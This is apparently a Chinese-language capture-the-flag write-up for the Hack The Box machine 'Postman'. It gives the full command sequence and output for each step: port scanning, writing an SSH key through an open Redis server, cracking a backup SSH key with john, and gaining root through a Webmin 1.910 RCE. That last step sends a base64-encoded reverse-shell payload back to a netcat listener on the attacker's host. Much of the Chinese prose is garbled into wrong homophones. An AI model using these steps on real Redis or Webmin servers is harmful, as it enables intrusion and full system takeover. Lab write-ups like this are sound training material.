免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
查看开明端口
┌──(rootkali)-[~/htb/Postman]└─# nmap -p- 10.10.10.160 --openStarting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 22:54 ESTNmap scan report for 10.10.10.160Host is up (0.31s latency).Not shown: 64665 closed ports, 866 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE22/tcp open ssh80/tcp open http6379/tcp open redis10000/tcp open snet-sensor-mgmtNmap done: 1 IP address (1 host up) scanned in 107.39 seconds查看端口详细信息
┌──(rootkali)-[~/htb/Postman]└─# nmap -sV -T4 -A -O 10.10.10.160 -p 22,80,6379,10000Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-23 22:57 ESTNmap scan report for 10.10.10.160Host is up (0.26s latency).PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))|_http-server-header: Apache/2.4.29 (Ubuntu)|_http-title: The Cyber Geek's Personal Website6379/tcp open redis Redis key-value store 4.0.910000/tcp open http MiniServ 1.910 (Webmin httpd)|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Android 4.2.2 (Linux 3.4) (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 443/tcp)HOP RTT ADDRESS1 251.42 ms 10.10.14.12 253.03 ms 10.10.10.160OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 52.24 seconds先把靶机域名写进host文件
echo "10.10.10.160 Postman" >> /etc/hosts
能够看到开了ssh服务,一个80端口的http服务,6379是redis服务,10000端口是webmin服务
webmin存在一个rce破绽,然而须要登录账号和明码。
┌──(rootkali)-[~/htb/Postman]└─# searchsploit webmin 1.910 130 ⨯---------------------------------------------------------------------- --------------------------------- Exploit Title | Path---------------------------------------------------------------------- ---------------------------------Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit | linux/remote/46984.rbWebmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit) | linux/webapps/47330.rb---------------------------------------------------------------------- ---------------------------------Shellcodes: No Resultsredis 4.0.9
redis这个版本如同存在一个rce,然而试了几个exp都报错
-ERR unknown command 'system.exec'
搜寻了一圈,在这个帖子下看到一个答案
The redis instance doesn't have MODULE command which is odd. If this is a CTF it might be intentional that the box creator removed it.
所以可能是被创建者人为移除了这个破绽
在hacktricks找到了一个通过批改redis的ssh配置文件,从而无明码登录靶机的办法,步骤如下:
- cli登录redis
redis-cli -h 10.10.10.160
应用get dir获取redis的装置目录
┌──(rootkali)-[~/htb/Postman]└─# redis-cli -h 10.10.10.16010.10.10.160:6379> config get dir1) "dir"2) "/var/lib/redis"
当初咱们晓得redis装置在靶机的/var/lib/redis目录,这一步次要是用于写ssh文件。
- kali端,把本地id_rsa.pub重定向到key.txt,须要留神要空两行
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt
- 把攻击机公钥写进靶机的
.ssh
cat key.txt | redis-cli -h 10.10.10.160 -x set ssh_key
再次登录靶机redis,获取ssh_key值,胜利显示,示意曾经写入
┌──(rootkali)-[~/htb/Postman]└─# redis-cli -h 10.10.10.16010.10.10.160:6379> GET ssh_key"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDX....- 设置redis的dir目录
CONFIG SET dir /var/lib/redis/.ssh
- 设置dbfilename为authorized_keys
dbfilename authorized_keys
- 保留
save
退出redis终端,ssh登录
┌──(rootkali)-[~/htb/Postman]└─# ssh redis@10.10.10.160The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.RSA key fingerprint is SHA256:FJdNat9qUrffCNDMV/0qF8efJdwa8NXW+iQ7NXuf/uk.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.10.160' (RSA) to the list of known hosts.Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Canonical Livepatch is available for installation.- Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatchLast login: Mon Aug 26 03:04:25 2019 from 10.10.10.1redis@Postman:~$ iduid=107(redis) gid=114(redis) groups=114(redis)redis@Postman:~$ whoamiredis
user.txt在用户matt下,redis账号没有权限
提权到matt
传linpeas,发现一个id_rsa.bak文件
╔══════════╣ Backup files (limited 100)-rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 /opt/id_rsa.bak 转成john能够辨认的款式
┌──(rootkali)-[~/htb/Postman]└─# /usr/share/john/ssh2john.py id_rsa >craskjohn破解
┌──(rootkali)-[~/htb/Postman]└─# john --wordlist=/usr/share/wordlists/rockyou.txt craskUsing default input encoding: UTF-8Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashesCost 2 (iteration count) is 2 for all loaded hashesWill run 4 OpenMP threadsNote: This format may emit false positives, so it will keep trying even afterfinding a possible candidate.Press 'q' or Ctrl-C to abort, almost any other key for statuscomputer2008 (id_rsa)Warning: Only 2 candidates left, minimum 4 needed for performance.1g 0:00:00:07 DONE (2021-12-25 01:04) 0.1290g/s 1850Kp/s 1850Kc/s 1850KC/sa6_123..*7¡Vamos!Session completed然而并不能间接登录
┌──(rootkali)-[~/htb/Postman]└─# ssh -i id_rsa matt@10.10.10.160 130 ⨯Enter passphrase for key 'id_rsa': Connection closed by 10.10.10.160 port 22而后尝试用明码computer2008间接切换到Matt,胜利了
redis@Postman:/opt$ su MattPassword: Matt@Postman:/opt$ iduid=1000(Matt) gid=1000(Matt) groups=1000(Matt)Matt@Postman:/opt$ whoamiMatt提权
webmin 1.910
webmin是一个基于web界面的类unix治理平台,因为须要管理系统的诸多类容,所以经常都是以root权限运行。
后面咱们曾经晓得啊这个版本的webmin存在一个rce,现在咱们又有了登录账号信息Matt:computer2008,当初咱们能够利用这个rce提权
应用github上这个RCE
先在kali开启一个监听
nc -lnvp 4242
执行攻打:
┌──(rootkali)-[~/htb/Postman]└─# python3 exploit_poc.py --ip_address=10.10.10.160 --port=10000 --lhost=10.10.14.3 --lport=4242 --user=Matt --pass=computer2008Webmin 1.9101- 'Package updates' RCE[+] Generating Payload...[+] Reverse Payload Generated : u=acl%2Fapt&u=%20%7C%20bash%20-c%20%22%7Becho%2CcGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4zOjQyNDIiKTtTVERJTi0%2BZmRvcGVuKCRjLHIpOyR%2BLT5mZG9wZW4oJGMsdyk7d2hpbGUoPD4pe2lmKCRfPX4gLyguKikvKXtzeXN0ZW0gJDE7fX07Jw%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22&ok_top=Update+Selected+Packages[+] Attempting to login to Webmin[+] Login Successful[+] Attempting to Exploit拿到反弹shell
┌──(rootkali)-[~/htb/Postman]└─# nc -lnvp 4242 listening on [any] 4242 ...connect to [10.10.14.3] from (UNKNOWN) [10.10.10.160] 36814iduid=0(root) gid=0(root) groups=0(root)whoamiroot曾经胜利提权到root